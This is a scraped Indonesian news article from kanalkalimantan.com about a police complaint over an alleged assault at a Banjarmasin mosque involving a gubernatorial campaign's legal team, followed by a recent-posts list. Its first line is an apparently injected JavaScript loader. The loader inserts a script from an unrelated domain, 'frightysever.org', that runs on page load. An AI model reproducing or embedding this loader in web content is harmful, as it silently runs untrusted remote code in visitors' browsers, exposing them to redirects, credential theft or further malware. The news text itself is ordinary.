(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Pilgub Kalsel

Polresta Banjarmasin Terima Pelaporan Insiden di Pemurus Baru


KANALKALIMANTAN.COM, BANJARMASIN – Insiden antara Salmansyah dan Jurkani di Masjid Nurul Iman, Jalan Prona 1 Kelurahan Pemurus Baru, Kecamatan Banjarmasin Selatan, Kota Banjarmasin, berujung dengan pelaporan dari pihak Salmansyah ke Polresta Banjarmasin.

Pelaporan tersebut dibenarkan oleh Kasat Reskrim Polresta Banjarmasin Kompol Alfian Tri Permadi.

“Ya memang ada laporan dari pihak Salmansyah, terkait dugaan penganiayaan dan saat ini masih dalam penyelidikan,” ujar Kompol Alfian.

Terkait permasalahn tersebut, pihak kepolisian akan menindak lanjuti sesuai dengan hukum yang berlaku.
“Untuk saat ini juga masih menunggu hasil visumnya,” ucap Kasat Reskrim.

Kompol Alfian juga menambahkan, hingga saat ini masih belum ada keterangan dari pihak yang terlapor.

Baca juga : Bantah Lakukan Pemukulan, Ini Kronologi Keributan di Masjid Nurul Iman Versi H2D

“Kami tidak akan membatasi atau menutupi, apabila pihak terlapor juga ingin melapor. Yang pastinya kita akan bersikap secara profesional terhadap kedua belah pihak,” pungkas Alfian.

Berdasar press realese yang disampaikan ke media, tim H2D menyampaikan peristiwa berawal dari rombongan Haji Denny yang melaksanakan agenda rutin kegiatan subuh keliling di Masjid Al Qomaruddin, letaknya persis di samping rumah Salmansyah alias Aman. Setelah selesai sholat dan mendengar ceramah, rombongan berangkat ke Masjid Nurul Iman.

Keberangkatan tim Haji Denny diikuti oleh Aman dan kawan-kawan, seakan tidak terima dengan kehadiran Haji Denny di Masjid Nurul Iman, hingga berujung pada keributan.

Jurkani, selaku tim hukum H2D mengatakan Aman merupakan simpatisan paslon lain. Maka ia pun menghampiri dan bertanya dari mana dan sedang apa tiba-tiba datang, karena acara ceramah subuh sudah selesai. Namun, Aman justru marah dan mengajak berkelahi.

Untuk mencegah terjadi keributan di dalam masjid, Jurkani mengajak Aman untuk keluar. Ketika keduanya keluar ke pekarangan masjid, di situlah terjadi keributan.

Sebelumnya, Aman mengatakan datang ke lokasi subuh keliling Denny Indrayana karena mengaku tertarik adanya kegiatan di masjid.

Usai sholat subuh, Aman mengaku datang ke masjid untuk mendengar ceramah. Saat duduk, dari posisi belakang Jurkani mengajaknya ke luar masjid karena menuduhnya penyusup.

“Saya dibilang penyusup, padahal warga di sini. Masker saya dilepasnya. Kemudian saya dipukul di wajah,” ujar Aman. (kanalkalimantan.com/tius)

 

Reporter : Tius
Editor : Kk

 

 


Al Ghifari

Recent Posts

Pj Bupati Erlin Hardi Berdialog dengan Mahasiswa Kapuas di Yogya

KANALKALIMANTAN.COM, YOGYAKARTA - Penjabat (Pj) Bupati Kapuas Erlin Hardi berdialog dengan mahasiswa asal Kabupaten Kapuas… Read More

1 jam ago

Modus Pinjam Bendera Perusahaan Korupsi Proyek RS Kelua Tabalong

Empat Terdakwa Jalani Sidang, Satu Orang Mantan Kepala Dinas Kesehatan Read More

2 jam ago

Camat Lurah Boleh Jabat Sekretariat PPK PPS

KANALKALIMANTAN.COM, BANJARBARU - Camat dan Lurah diperbolehkan menjabat sebagai Sekretariat Panitia Pemungutan Kecamatan (PPK) maupun… Read More

15 jam ago

Sekretaris Nasdem Kalsel Melamar Golkar, Rozanie Sadar Cukup Posisi Calon Wagub

KANALKALIMANTAN.COM, BANJARMASIN - Pemilihan Kepala Daerah (Pilkada) serentak 2024, sejumlah tokoh mulai mencari dukungan partai… Read More

15 jam ago

Mesin Terbakar di Udara, Pesawat Jemaah Haji Kloter 5 Embarkasi Makassar Kembali Mendarat

KANALKALIMANTAN.COM, MAKASSAR - Momen mencekam mewarnai penerbangan 450 jemaah haji asal Sulawesi Selatan (Sulsel) terjadi,… Read More

16 jam ago

Meteran Air Leding PAM Bandarmasih Hilang, Biaya Pergantian Ditanggung Pelanggan

KANALAKALIMANTAN.COM, BANJARMASIN - Pelanggan air bersih Perusahan Air Minum (PAM) Bandarmasih Kota Banjarmasin Provinsi Kalimantan… Read More

16 jam ago

This website uses cookies.